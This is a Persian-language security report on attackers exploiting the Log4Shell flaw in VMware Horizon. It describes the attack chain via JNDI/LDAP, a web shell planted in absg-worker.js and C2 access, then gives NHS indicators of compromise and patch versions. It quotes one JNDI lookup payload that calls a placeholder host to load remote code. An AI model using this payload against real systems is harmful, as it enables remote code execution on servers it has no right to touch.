سوءاستفاده هکرها از Log4Shell در VMware Horizon
برخی منابع درخصوص سوءاستفاده مهاجمانی ناشناس از ضعف امنیتی Log4Shell در VMware Horizon هشدار دادهاند.
در این گزارش که با همکاری شرکت مهندسی شبکه گستر و مرکز مدیریت راهبردی افتای ریاست جمهوری تهیه گردیده، حملات مذکور مورد بررسی قرار گرفته است.
Log4Shell یا LogJam اولین آسیبپذیری است که در هفتههای اخیر در کتابخانه Log4j کشف شد و دارای شناسه CVE-2021-44228 میباشد. سوءاستفاده گسترده از ضعف امنیتی مذکور، پس از انتشار یک نمونه اثباتگر (Proof-of-Concept – به اختصار PoC) در GitHub از حدود 18 آذر آغاز شد.
آسیبپذیری مذکور، حملاتی از نوع “اجرای کد از راه دور” (Remote Code Execution – به اختصار RCE) را برای مهاجمان فراهم میکند. با توجه به استفاده گسترده Log4j و از آنجایی که سوءاستفاده از ضعف امنیتی مذکور نیازی به تخصص فنی سطح بالا و احراز هویت ندارد، آسیبپذیری مذکور به کابوسی برای سازمانها در سراسر جهان تبدیل شده و کاربران خانگی و سازمانها را در معرض خطر قرار میدهد. از این رو، شرکت آپاچی ضعف امنیتی فوق و سه آسیبپذیری شناسایی شده پس از آن را از طریق بهروزرسانیهای امنیتی بعدی برطرف کرد. اکنون 2.17.1 ایمنترین نسخه برای Log4j در نظر گرفته میشود.
طبق اطلاعیهای که به تازگی NHS صادر کرده و مشروح آن در نشانی زیر قابل دسترس است، مهاجمان از این ضعف امنیتی برای اجرای کد از راه دور در نسخ آسیبپذیر VMware Horizon در زیرساختهای عمومی سوءاستفاده میکنند.
https://digital.nhs.uk/cyber-alerts/2022/cc-4002
این سازمان احتمال داده است که سوءاستفاده مذکور تنها مرحله شناسایی (Reconnaissance Phase) است، که مهاجمان با سوءاستفاده از Log4Shell از Java Naming and Directory InterfaceTM – به اختصار JNDI – برای شناسایی زیرساختهای مخرب استفاده میکنند.
زمانی که آسیبپذیری شناسایی میشود، مهاجم از Lightweight Directory Access Protocol (LDAP) برای بازیابی و اجرای یک فایل مخرب مبتنی بر Java استفاده کرده و یک پوسته وب (Web Shell) را به سرویس VM Blast Secure Gateway تزریق میکند.
مهاجمان میتوانند از پوسته وب مذکور برای انجام فعالیتهای مخربی همچون استقرار بدافزار، استخراج دادهها یا اجرای باجافزار استفاده کنند. مهاجمان از وجود سرویس Apache Tomcat تعبیه شده در VMware Horizon که در برابر Log4Shell آسیبپذیر است، سوءاستفاده میکند. سوءاستفاده معمولاً با کد ساده و پرکاربرد {jndi:ldap://example.com}$ آغاز شده و فرمان PowerShell زیر را از Tomcat ایجاد میکند.
این فرمان یک سرویس از Win32 را جهت دریافت فهرستی از اسامی سرویس VMBlastSG فراخوانی نموده، مسیرها را بازیابی کرده و “absg-worker.js” را تغییر میدهد تا یک Listener را بارگذاری نماید و سپس سرویس را به منظور فعال شدن کد اصلی مخرب مجدداً راهاندازی میکند.
Listener بارگذاری شده، مسئول اجرای فرامین دلخواه دریافت شده از طریق HTTP/HTTPS است که به عنوان Header در رشته دادههای تعبیه شده، درج شده است. در این مرحله، مهاجم ارتباط مستمر و پایداری با سرور C2 برقرار کرده و میتواند دادهها را استخراج، فرامین را اجرا یا باجافزار را مستقر کند.
VMware Horizon تنها محصول VMware نیست که توسط مهاجمان با سوءاستفاده از آسیبپذیری Log4j مورد هدف قرار گرفته است.
باجافزار Conti نیز از Log4Shell جهت گسترش دامنه آلودگی در سرورهای آسیبپذیر VMware vCenter و رمزگذاری آسانتر ماشینهای مجازی استفاده میکند.
NHS در گزارش خود به سه نشانه از بهرهجویی در سیستمهای آسیبپذیر اشاره کرده است:
- شواهدی از ایجاد پروسههای غیرعادی توسط ws_TomcatService.exe
- وجود VMBlastSG در خطفرمان هر یک از پروسههای powershell.exe
- تغییرات فایل در “VMware\VMware View\Server\appblastgateway\lib\absg-worker.js\…”؛ این فایل معمولاً در طول ارتقاء، بازنویسی شده و تغییر نمیکند.
شرکت ویامور (.VMware, Inc)، ماه گذشته یک بهروزرسانی امنیتی برای Horizon و سایر محصولات خود منتشر نمود و ضعفهای امنیتی به شناسههای CVE-2021-44228 و CVE-2021-45046 را با انتشار نسخههای 2111، 7.13.1 و 7.10.3 ترمیم کرد.
به تمام راهبران محصولات VMware توصیه میشود در اسرع وقت با مراجعه به نشانی زیر نسبت به بهروزرسانی محصولات خود اقدام کرده تا از گزند این حملات در امان باشند:
https://www.vmware.com/security/advisories/VMSA-2021-0028.html
منبع: